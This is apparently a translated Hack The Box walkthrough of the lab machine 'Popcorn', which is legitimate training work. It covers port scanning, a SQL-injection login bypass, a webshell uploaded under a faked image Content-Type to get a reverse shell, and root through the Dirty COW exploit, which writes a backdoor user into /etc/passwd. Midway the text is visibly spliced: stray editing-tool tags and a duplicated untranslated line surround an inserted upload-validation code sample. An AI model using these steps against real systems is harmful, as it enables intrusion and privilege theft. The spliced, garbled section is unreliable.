Port scan

┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 20:56 CST
Nmap scan report for 10.10.10.6
Host is up (0.072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds
┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 20:57 CST
Nmap scan report for 10.10.10.6
Host is up (0.066s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: AVM FRITZ!Box FON WLAN 7240 WAP (96%), Android 2.3.5 (Linux 2.6) (96%), Linux 2.6.17 - 2.6.36 (96%), Linux 2.6.32 (96%), Linux 2.6.17 (95%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Linux 2.6.30 (94%), Linux 2.6.35 (94%), Epson WF-2660 printer (94%), Linux 2.4.20 (Red Hat 7.2) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds

Add a hosts entry for popcorn.htb (the redirect target nmap reported)

Web

/test.php is a phpinfo page, which shows that both the PHP version and the OS version are quite old. /torrent is another page with a login form; the classic universal-password (SQL injection) login bypass gets straight through it.

Run a directory scan, then look at the other features.

┌──(mikannse㉿kali)-[~/HTB/popcorn]
└─$ feroxbuster -u http://popcorn.htb/ -x rar,php,zip,sql,txt,html,bak --filter-status 404 -k

There is an upload feature, but it only accepts torrent files.
</gre_replace>
<gr_replace lines="50" cat="clarify" orig="这里泄露了">
An SQL file is leaked here: http://popcorn.htb/torrent/database/th_database.sql

这里泄露了一个sql文件: http://popcorn.htb/torrent/database/th_database.sql

It yields admin:admin12, but that is not of much use.

Back at the upload point, pick any torrent file and upload it. Under Browse you can view the torrent you just uploaded, and it turns out the thumbnail can be edited, which allows uploading an image. So try uploading a webshell again: send a full-featured PHP webshell directly and change the Content-Type in the multipart request, like this:

Content-Disposition: form-data; name="file"; filename="php-reverse-shell.php"
Content-Type: image/png

Go to the /upload directory found in the earlier scan and request the file to trigger the PHP reverse shell.
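As an added example from the defender's side (not code from the write-up or from the torrent application), the check the thumbnail upload should have made, shown beside the header-only check that the Content-Type edit above bypasses; the sample filenames and bytes are constructed.

```python
import os

# Added example, not code from the write-up or the torrent application. The
# thumbnail upload above took a PHP file once the multipart header claimed
# image/png; the client controls that header, so check the file itself.

# Leading bytes of the image formats a thumbnail upload should accept.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

def weak_check(filename: str, content_type: str, data: bytes) -> bool:
    """Header-only check: exactly what editing Content-Type defeats."""
    return content_type.startswith("image/")

def detect_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for signature, kind in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return kind
    return None

def extension_matches(ext: str, kind: str) -> bool:
    """JPEG may carry .jpg or .jpeg; everything else must match exactly."""
    return ext in ("jpg", "jpeg") if kind == "jpg" else ext == kind

def hardened_check(filename: str, content_type: str, data: bytes):
    """Accept only files whose extension and leading bytes both say image.
    Returns (accepted, reason_or_kind)."""
    if not content_type.startswith("image/"):
        return False, "content-type is not image/*"
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} is not allowed"
    kind = detect_image_type(data)
    if kind is None:
        return False, "no image signature in file body"
    if not extension_matches(ext, kind):
        return False, f"extension .{ext} does not match {kind} content"
    # Store under a server-generated name afterwards; never reuse the client's.
    return True, kind

# Constructed sample uploads: a PHP file relabelled as PNG, and a real PNG header.
PHP_UPLOAD = ("php-reverse-shell.php", "image/png", b"<?php echo 'not an image'; ?>")
PNG_UPLOAD = ("cover.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
```

The header-only check accepts the relabelled PHP file; the hardened check rejects it on the extension alone, and a PHP body renamed to .png still fails on the missing image signature.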

www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

Privilege escalation

The kernel version is pitifully old, so Dirty COW it is. At first I used this one:

Linux Kernel 2.6.22 < 3.9 (x86/x64) - ‘Dirty COW /proc/self/mem’ R | linux/local/40616.c

But that failed, so I switched to 40839.c, which does work. Upload the .c file to the target, compile and run it, and enter a password to create a backdoor user.

www-data@popcorn:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@popcorn:/tmp$ chmod +x dirty
chmod +x dirty
www-data@popcorn:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root

Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash

mmap: b77b1000

It hangs at this step, but after waiting a while, interrupting this shell and re-establishing the reverse shell shows that the user was created successfully. Switch to that user and you have root!

Closing thoughts

Still a fairly easy box; the main thing is that the Linux version is just too old, lol.